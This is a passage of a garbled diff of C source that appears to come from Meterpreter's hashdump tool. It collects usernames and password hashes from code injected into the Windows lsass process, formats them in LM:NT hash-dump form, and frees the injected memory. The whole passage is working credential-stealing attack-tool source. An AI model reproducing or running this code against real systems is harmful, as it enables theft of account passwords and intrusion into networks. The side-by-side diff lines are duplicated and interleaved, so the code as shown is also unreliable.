if (sBytesRead != UsernameHashResults[dwCurrentUserIndex].Length)
{
dwError = 1; break;
}
UsernameHashResults[dwCurrentUserIndex].Username[UsernameHashResults[dwCurrentUserIndex].Length] = 0;
} }
/* signal that all data has been read and wait for the remote memory to be free'd */ /* signal that all data has been read and wait for the remote memory to be free'd */
if (SetEvent(hFreeLock) == 0) { dwError = 1; break; } if (SetEvent(hFreeLock) == 0)
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) { {
dwError = 1; break;
}
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
{
dprintf("The timeout hit.\n"); dprintf("The timeout hit.\n");
dwError = 1; dwError = 1;
break; break;
} }
/* display the results and free the malloc'd memory for the username */ /* display the results and free the malloc'd memory for the username */
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
/* METERPRETER CODE */ /* METERPRETER CODE */
hashstring = StringCombine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username); hashstring = StringCombine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username);
@ -601,24 +798,26 @@ int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults
/* END METERPRETER CODE */ /* END METERPRETER CODE */
//printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID); //printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID);
for (HashIndex = 16; HashIndex < 32; HashIndex++) { for (HashIndex = 16; HashIndex < 32; HashIndex++)
/* ORANGE - insert check for ***NO PASSWORD*** {
/* ORANGE - insert check for ***NO PASSWORD***
if( (regData[4] == 0x35b4d3aa) && (regData[5] == 0xee0414b5) if( (regData[4] == 0x35b4d3aa) && (regData[5] == 0xee0414b5)
&& (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) ) && (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) )
sprintf( LMdata, "NO PASSWORD*********************" ); sprintf( LMdata, "NO PASSWORD*********************" );
*/ */
_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); _snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = StringCombine(hashstring, buffer); hashstring = StringCombine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); //printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
} }
hashstring = StringCombine(hashstring, ":"); hashstring = StringCombine(hashstring, ":");
//printf(":"); //printf(":");
for (HashIndex = 0; HashIndex < 16; HashIndex++) { for (HashIndex = 0; HashIndex < 16; HashIndex++)
{
/* ORANGE - insert check for ***NO PASSWORD*** /* ORANGE - insert check for ***NO PASSWORD***
if( (regData[0] == 0xe0cfd631) && (regData[1] == 0x31e96ad1) if( (regData[0] == 0xe0cfd631) && (regData[1] == 0x31e96ad1)
&& (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) ) && (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) )
sprintf( NTdata, "NO PASSWORD*********************" ); sprintf( NTdata, "NO PASSWORD*********************" );
*/ */
_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); _snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = StringCombine(hashstring, buffer); hashstring = StringCombine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex])); //printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
@ -627,30 +826,51 @@ int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults
hashstring = StringCombine(hashstring, ":::\n"); hashstring = StringCombine(hashstring, ":::\n");
//printf(":::\n"); //printf(":::\n");
} }
} while(0); } while (0);
/* relesase the event objects */ /* relesase the event objects */
if (hReadLock) { CloseHandle(hReadLock); } if (hReadLock)
if (hFreeLock) { CloseHandle(hFreeLock); } {
CloseHandle(hReadLock);
}
if (hFreeLock)
{
CloseHandle(hFreeLock);
}
/* close handle to lsass */ /* close handle to lsass */
if (hLsassHandle) { CloseHandle(hLsassHandle); } if (hLsassHandle)
{
CloseHandle(hLsassHandle);
}
/* free the context structure and the injected function and the results */ /* free the context structure and the injected function and the results */
if (pvParameterMemory) { VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE); } if (pvParameterMemory)
if (pvFunctionMemory) { VirtualFreeEx(hLsassHandle, pvFunctionMemory, FunctionSize, MEM_RELEASE); } {
VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE);
}
if (pvFunctionMemory)
{
VirtualFreeEx(hLsassHandle, pvFunctionMemory, FunctionSize, MEM_RELEASE);
}
/* free the remote thread handle */ /* free the remote thread handle */
if (hThreadHandle) { CloseHandle(hThreadHandle); } if (hThreadHandle)
{
CloseHandle(hThreadHandle);
}
/* free the results structure including individually malloced space for usernames */ /* free the results structure including individually malloced space for usernames */
if (UsernameHashResults) { if (UsernameHashResults)
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { {
if (UsernameHashResults[dwCurrentUserIndex].Username) { for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
if (UsernameHashResults[dwCurrentUserIndex].Username)
{
free(UsernameHashResults[dwCurrentUserIndex].Username); free(UsernameHashResults[dwCurrentUserIndex].Username);
} }
} }
free(UsernameHashResults); free(UsernameHashResults);
} }
/* return hashresults */ /* return hashresults */